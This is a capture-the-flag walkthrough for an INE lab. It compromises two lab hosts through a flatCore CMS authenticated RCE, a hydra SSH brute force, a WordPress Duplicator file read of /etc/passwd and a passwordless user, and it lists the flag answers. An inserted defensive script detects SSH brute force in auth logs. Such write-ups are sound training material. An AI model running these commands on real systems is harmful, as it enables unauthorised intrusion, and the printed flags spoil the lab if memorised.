Penetration Testing Exploitation CTF 1

Overview

This lab focuses on identifying and exploiting vulnerabilities across two target Linux machines. The goal is to analyze web applications and services running on these machines to uncover weaknesses and exploit them to retrieve critical flags. The tasks involve leveraging known credentials, insecure configurations, and vulnerable plugins to compromise systems and access sensitive data.

Target Machines

  • target1.ine.local
  • target2.ine.local

Flags to Capture

  1. Flag 1: Exploit the vulnerable web application on target1.ine.local and retrieve the flag from the root directory.
  2. Hint: Credentials admin:password1 may be useful.
  3. Flag 2: Compromise an insecure system user on target1.ine.local.
  4. Flag 3: Exploit a vulnerable plugin in the web application on target2.ine.local and retrieve flag3.txt from the root directory.
  5. Flag 4: Compromise a system user on target2.ine.local that requires no authentication.

Useful Wordlists

  • /usr/share/nmap/nselib/data/wp-plugins.lst
  • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Writeup

Flag 1: Exploiting the Web Application on target1.ine.local

Step 1: Initial Enumeration

We start with an Nmap scan to identify open ports and services:

nmap -p- target1.ine.local --min-rate=10000
Findings:
  • Ports open: 22 (SSH), 80 (HTTP)

A deeper scan reveals:
  • Apache 2.4.41 running on port 80.
  • flatCore CMS is being used.
  • robots.txt contains disallowed directories (/acp/, /core/, /lib/, /modules/).

Step 2: Identifying the CMS Version

By visiting http://target1.ine.local/styles/default/info.xml, we find:

<theme>
   <name>defaultTheme</name>
   <version>1.5</version>
   <license>GNU General Public License</license>
   <author>flatCore Dev Team</author>
</theme>

Step 3: Searching for Exploits

Using searchsploit, we find an authenticated RCE exploit:

searchsploit flatcore
  • Exploit used: FlatCore CMS 2.0.7 - Remote Code Execution (Authenticated)

Step 4: Exploiting the CMS

Using the provided credentials (admin:password1), we execute the exploit:

python3 exploit.py http://target1.ine.local admin password1
  • We gain a limited shell as www-data.
  • We locate Flag 1 in /flag1.txt.

Flag 1

c76022ae98b84572aee18542fe8ca614


Flag 2: Compromising a Weak User on target1.ine.local

Step 1: Enumerating Users

From the shell, we check /etc/passwd:

cat /etc/passwd
  • We find a weak user: iamaweakuser.

Step 2: Bruteforcing SSH Credentials

Using hydra, we brute-force the password:

hydra -l iamaweakuser -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://target1.ine.local
  • Password found: angel

Step 3: Retrieving Flag 2

Logging in via SSH:

ssh iamaweakuser@target1.ine.local
  • Flag 2 is found in /home/iamaweakuser/flag2.txt.

Flag 2

28f059b2ddaa4ca8a80b202a569fa721
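From the defender's side, the brute-force in Step 2 leaves a distinctive trail in sshd's auth log: a burst of "Failed password" lines for one user from one source, followed by an "Accepted password" from the same source. The script below is an added detection example and not part of the original writeup; the log lines, hostname, IP addresses and ports are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in auth.log syslog format; host, IP and port values are made up.
SAMPLE_AUTH_LOG = """\
Mar  3 10:14:01 target1 sshd[2101]: Failed password for iamaweakuser from 10.10.0.7 port 50122 ssh2
Mar  3 10:14:01 target1 sshd[2103]: Failed password for iamaweakuser from 10.10.0.7 port 50124 ssh2
Mar  3 10:14:02 target1 sshd[2105]: Failed password for iamaweakuser from 10.10.0.7 port 50126 ssh2
Mar  3 10:14:02 target1 sshd[2107]: Failed password for iamaweakuser from 10.10.0.7 port 50128 ssh2
Mar  3 10:14:03 target1 sshd[2109]: Failed password for iamaweakuser from 10.10.0.7 port 50130 ssh2
Mar  3 10:14:04 target1 sshd[2113]: Accepted password for iamaweakuser from 10.10.0.7 port 50134 ssh2
Mar  3 10:20:15 target1 sshd[2200]: Failed password for admin from 10.10.0.9 port 41000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse(line, year=2025):
    # Returns (timestamp, result, user, src); syslog lines carry no year, so one is assumed.
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Alert on (src, user) pairs with `threshold` failures inside `window`; note a later success."""
    failures = defaultdict(list)  # (src, user) -> timestamps of recent failures
    alerts = {}
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        key = (src, user)
        if result == "Failed":
            recent = [t for t in failures[key] if ts - t <= window] + [ts]
            failures[key] = recent
            if len(recent) >= threshold:
                alerts.setdefault(key, {"failures": 0, "succeeded_after": False})
                alerts[key]["failures"] = len(recent)
        elif key in alerts:
            # a success right after a burst of failures means a guessed password worked
            alerts[key]["succeeded_after"] = True
    return [(s, u, a["failures"], a["succeeded_after"]) for (s, u), a in alerts.items()]
```

Running `detect_bruteforce(SAMPLE_AUTH_LOG.splitlines())` flags 10.10.0.7 against iamaweakuser with a successful login after the burst, while the single failure for admin stays below the threshold.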


Flag 3: Exploiting a Vulnerable Plugin on target2.ine.local

Step 1: Initial Nmap Scan

nmap -p- target2.ine.local --min-rate=10000
  • Open ports: 22 (SSH), 80 (HTTP)

A deeper scan reveals:
  • WordPress 6.1 running on port 80.

Step 2: Enumerating WordPress Plugins

Using Nmap’s WordPress enumeration script:

nmap -p80 target2.ine.local --script=http-wordpress-enum --script-args search-limit=all
  • Vulnerable plugin found: Duplicator 1.3.26.

Step 3: Exploiting Arbitrary File Read

Using an exploit for Duplicator 1.3.26:

python3 exploit.py http://target2.ine.local /flag3.txt
  • Flag 3 is retrieved.

Flag 3

d82e7c95c19f45ba931d834eac0f29d7


Flag 4: Compromising a No-Auth User on target2.ine.local

Step 1: Finding System Users

Using the same exploit, we read /etc/passwd:

python3 exploit.py http://target2.ine.local /etc/passwd
  • User found: iamacrazyfreeuser.

Step 2: Testing SSH Login

The user allows passwordless login (any password works):

ssh iamacrazyfreeuser@target2.ine.local
  • Flag 4 is in /home/iamacrazyfreeuser/flag4.txt.

Flag 4

144cf9ee29a74b53925b35b617cffde4